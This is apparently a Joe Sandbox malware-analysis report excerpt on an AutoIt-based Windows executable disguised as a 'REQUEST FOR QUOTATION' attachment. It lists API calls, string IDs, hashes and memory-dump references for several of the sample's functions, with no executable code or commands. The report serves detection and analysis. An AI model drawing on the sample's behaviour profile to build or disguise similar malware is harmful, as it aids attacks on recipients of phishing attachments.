                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff19a083962564101d0b0bee14167f2d37b8cd78877080f1dcf00369c6d7ebf7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __wcsnicmp
                                                                                                                                                                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                                                                                              • API String ID: 1038674560-1810252412
                                                                                                                                                                                                                              • Opcode ID: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                                                                                                                                                                                                                              • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                                                                                                                                                                                                                              • GetCursorInfo.USER32(?), ref: 004750C8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cursor$Load$Info
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2577412497-0
                                                                                                                                                                                                                              • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                                                                                                                                                                              • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 0048A259
                                                                                                                                                                                                                              • DestroyWindow.USER32(?,?), ref: 0048A2D3
                                                                                                                                                                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                                                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 0048A3A4
                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0048A40D
                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 0048A414
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                                                                                                                                                                                                                                • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                                                                                              • String ID: 0$tooltips_class32
                                                                                                                                                                                                                              • API String ID: 1297703922-3619404913
                                                                                                                                                                                                                              • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                                                                                                                                                              • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00484424
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                                                                                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                              • API String ID: 3974292440-4258414348
                                                                                                                                                                                                                              • Opcode ID: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                                                                                                                                                                                                                              • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32 ref: 0046A418
                                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                                                                                                                                                                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                              • API String ID: 2698844021-4113822522
                                                                                                                                                                                                                              • Opcode ID: 437170107335614e440451c14e1bb7fb1cb2a37dfa70594022b46967140f2eef
                                                                                                                                                                                                                              • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 437170107335614e440451c14e1bb7fb1cb2a37dfa70594022b46967140f2eef
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                                                                                                                                                                                                                              • GetFocus.USER32 ref: 0048C20C
                                                                                                                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 0048C342
                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                                                                                                                                                                                                                              • GetMenuItemCount.USER32(?), ref: 0048C38D
                                                                                                                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                                                                                                                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                              • API String ID: 1296962147-4108050209
                                                                                                                                                                                                                              • Opcode ID: 901300d993ba4ef79483208aca69c4f68d103eaf980791bed4d4ab6720b8591f
                                                                                                                                                                                                                              • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 901300d993ba4ef79483208aca69c4f68d103eaf980791bed4d4ab6720b8591f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 0047738F
                                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 004773A7
                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 004773B4
                                                                                                                                                                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                                                                                                                                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                                                                                                                                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                                                                                                                                                                                                                              • SelectObject.GDI32(00000006,?), ref: 00477470
                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00477479
                                                                                                                                                                                                                              • DeleteDC.GDI32(00000006), ref: 00477480
                                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 0047748B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                                              • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                              • Opcode ID: 9b840f603ca055cf69c59b17ce240dfc30cb433146a2e1f05c36ea0610a5c8fc
                                                                                                                                                                                                                              • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b840f603ca055cf69c59b17ce240dfc30cb433146a2e1f05c36ea0610a5c8fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                                                                                                                                                                                                                                • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                                                                                                                                                                                                                                • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                                                                                                                                                                                                                                • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                                                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                                                                              • API String ID: 537147316-1018226102
                                                                                                                                                                                                                              • Opcode ID: 00f5ad29cbd74208124febe5334822c6d1637248e6c454184ba00883e386fc4d
                                                                                                                                                                                                                              • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00f5ad29cbd74208124febe5334822c6d1637248e6c454184ba00883e386fc4d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00462D50
                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                                                                                                                                                                                                                              • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                                                                                                                                                                                                                              • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                                                                                                                                                                                                                              • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                                                                                                                                                                                                                              • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                                                                                                                                                                                                                              • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                                                                                                                                                                                                                              • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00462F56
                                                                                                                                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                                                                                                                                                                                                                              • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3993528054-0
                                                                                                                                                                                                                              • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                                                                                                                                                                                              • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 00B22543
                                                                                                                                                                                                                                • Part of subcall function 00B23073: _free.LIBCMT ref: 00B23090
                                                                                                                                                                                                                                • Part of subcall function 00B23073: _free.LIBCMT ref: 00B230A2
                                                                                                                                                                                                                                • Part of subcall function 00B23073: _free.LIBCMT ref: 00B230B4
                                                                                                                                                                                                                                • Part of subcall function 00B23073: _free.LIBCMT ref: 00B230C6
                                                                                                                                                                                                                                • Part of subcall function 00B23073: _free.LIBCMT ref: 00B230D8
                                                                                                                                                                                                                                • Part of subcall function 00B23073: _free.LIBCMT ref: 00B230EA
                                                                                                                                                                                                                                • Part of subcall function 00B23073: _free.LIBCMT ref: 00B230FC
                                                                                                                                                                                                                                • Part of subcall function 00B23073: _free.LIBCMT ref: 00B2310E
                                                                                                                                                                                                                                • Part of subcall function 00B23073: _free.LIBCMT ref: 00B23120
                                                                                                                                                                                                                                • Part of subcall function 00B23073: _free.LIBCMT ref: 00B23132
                                                                                                                                                                                                                                • Part of subcall function 00B23073: _free.LIBCMT ref: 00B23144
                                                                                                                                                                                                                                • Part of subcall function 00B23073: _free.LIBCMT ref: 00B23156
                                                                                                                                                                                                                                • Part of subcall function 00B23073: _free.LIBCMT ref: 00B23168
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B22538
                                                                                                                                                                                                                                • Part of subcall function 00B22096: HeapFree.KERNEL32(00000000,00000000,?,00B23208,?,00000000,?,00000000,?,00B2322F,?,00000007,?,?,00B22697,?), ref: 00B220AC
